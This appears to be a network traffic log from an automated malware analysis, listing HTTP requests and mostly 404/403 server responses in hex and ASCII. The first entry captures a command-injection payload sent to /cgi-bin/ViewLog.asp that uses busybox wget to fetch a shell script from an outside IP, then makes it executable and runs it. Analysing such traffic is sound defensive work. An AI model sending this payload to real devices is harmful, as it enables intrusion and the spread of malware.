    Source: unknownHTTP traffic detected: POST /cgi-bin/ViewLog.asp HTTP/1.1Host: 192.168.0.14:80Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: python-requests/2.20.0Content-Length: 227Content-Type: application/x-www-form-urlencodedData Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 1050Date: Wed, 14 Feb 2024 08:28:47 GMT
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:29:00 GMTServer: Apache/2.4.38 (Win64) OpenSSL/1.1.1b PHP/7.3.3Vary: accept-language,accept-charsetContent-Length: 438Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 62 20 50 48 50 2f 37 2e 33 2e 33 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.38 (Win64) OpenSSL/1.1.1b PHP/7.3.3 Server at 192.168.0.14 Port 80</address></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:29:01 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 181Keep-Alive: timeout=15, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 4b 0f 82 30 10 84 ef fc 8a 95 bb 2c 1a 8e 4d 0f f2 88 24 88 c4 94 83 47 4c d7 94 04 69 a5 c5 c7 bf 97 c7 c5 e3 ec cc 37 b3 6c 93 9c 63 71 ad 52 38 8a 53 01 55 7d 28 f2 18 fc 2d 62 9e 8a 0c 31 11 c9 ea ec 83 10 31 2d 7d ee 31 e5 1e 1d 67 8a 1a 39 09 d7 ba 8e 78 14 46 50 6a 07 99 1e 7b c9 70 3d 7a 0c 97 10 bb 69 f9 9d b9 1d ff cb 4c ca 63 86 0b 45 30 d0 73 24 eb 48 42 7d 29 00 db 5e d2 27 30 ca c0 bb b1 d0 4f c8 7d 46 40 f7 e0 54 6b c1 d2 f0 a2 21 60 68 e6 89 a5 7c aa 9b 9f f2 7e 74 46 9f df cf 00 00 00 Data Ascii: MK0,M$GLi7lcqR8SU}(-b11-}1g9xFPj{p=ziLcE0s$HB})^'0O}F@Tk!`h|~tF
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 0X-NWS-LOG-UUID: 14817034343562233346Connection: closeServer: Lego ServerDate: Wed, 14 Feb 2024 08:29:04 GMTX-Cache-Lookup: Return Directly
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:29:05 GMTContent-Length: 0Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 0X-NWS-LOG-UUID: 8051582542529074328Connection: closeServer: Lego ServerDate: Wed, 14 Feb 2024 08:29:05 GMTX-Cache-Lookup: Return Directly
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeTransfer-Encoding: chunked
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 10:26:52 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:29:14 GMTConnection: Close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:29:16 GMTContent-Length: 0Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbidden
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:21:19 GMTServer: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8o PHP/5.3.8-ZS5.5.0Content-Length: 217Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:29:23 GMTServer: webX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:29:30 GMTContent-Type: text/htmlContent-Length: 150Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeServer: TESTDate: Wed, 14 Feb 2024 08:29:35 GMTContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0d 0a 3c 74 69 74 6c 65 3e 5a 69 65 68 65 72 31 37 38 31 41 57 20 2d 20 45 72 72 6f 72 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0d 0a 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 6c 6f 67 69 6e 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 20 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 61 6e 63 6f 6d 2d 73 79 73 74 65 6d 73 2e 64 65 22 3e 3c 69 6d 67 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 69 6d 67 22 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 70 72 6f 64 75 63 74 73 76 67 2e 73 76 67 22 20 61 6c 74 3d 22 4c 41 4e 43 4f 4d 20 53 79 73 74 65 6d 73 20 48 6f 6d 65 70 61 67 65 22 3e 3c 2f 61 3e 3c 70 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 70 22 3e 4c 41 4e 43 4f 4d 20 31 37 38 31 41 57 3c 2f 70 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 69 6e 63 6f 6e 74 65 6e 74 20 64 75 6c 6c 45 72 72 6f 72 22 3e 0d 0a 3c 68 32 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 59 6f 75 20 61 73 6b 65 64 20 66 6f 72 20 61 20 55 52 4c 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 3c 2f 70 3e 0d 0a 3c 66 6f 72 6d 20 6d 65 74 68 6f 64 3d 22 50 4f 53 54 22 20 61 63 74 69 6f 6e 3d 22 2f 22 20 3e 0d 0a 3c 64 69 76 3e 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 6d 61 69 6e 50 61 67 65 4c 69 6e 6b 22 20 61 63 63 65 73 73 6b 65 79 3d 22 62 22 20 6f 6e 63 6c 69 63 6b 3d 22 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 2f 27 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 26 71 75 6f 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 26 71 75 6f 74 3b 3e 42 3c 2f 73 70 61 6e 3e 61 63 6b 20 74 6f 20 4d 61 69 6e 2d 50 61 67 65 3c 2f 62 75 74 74 6f 6e 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 66 6f 72 6d 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 3c 2f
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:29:40 GMTServer: ApacheContent-Length: 338Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p><p>Additionally, a 400 Bad Requesterror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:45:42 GMTServer: Apache/2.4.6 (CentOS)Content-Length: 217Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-control:no-cache
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.0.15Date: Wed, 14 Feb 2024 08:29:46 GMTContent-Type: text/html; charset=utf-8Content-Length: 169Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 30 2e 31 35 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.0.15</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:29:54 GMTContent-Length: 489Content-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 33 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 31 3e 0a 3c 70 3e 53 6f 72 72 79 2c 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 62 72 2f 3e 0a 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 69 73 20 70 6f 77 65 72 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 66 61 74 65 64 69 65 72 2f 66 72 70 22 3e 66 72 70 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 70 3e 3c 65 6d 3e 46 61 69 74 68 66 75 6c 6c 79 20 79 6f 75 72 73 2c 20 66 72 70 2e 3c 2f 65 6d 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html><head><title>Not Found</title><style> body { width: 35em; margin: 0 auto; font-family: Tahoma, Verdana, Arial, sans-serif; }</style></head><body><h1>The page you requested was not found.</h1><p>Sorry, the page you are looking for is currently unavailable.<br/>Please try again later.</p><p>The server is powered by <a href="https://github.com/fatedier/frp">frp</a>.</p><p><em>Faithfully yours, frp.</em></p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:30:04 GMTServer: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.4.2Vary: accept-language,accept-charsetContent-Length: 417Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 63 20 50 48 50 2f 37 2e 34 2e 32 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.4.2 Server at 192.168.0.14 Port 80</address></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 10:26:24 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Type: text/plainTransfer-Encoding: chunked
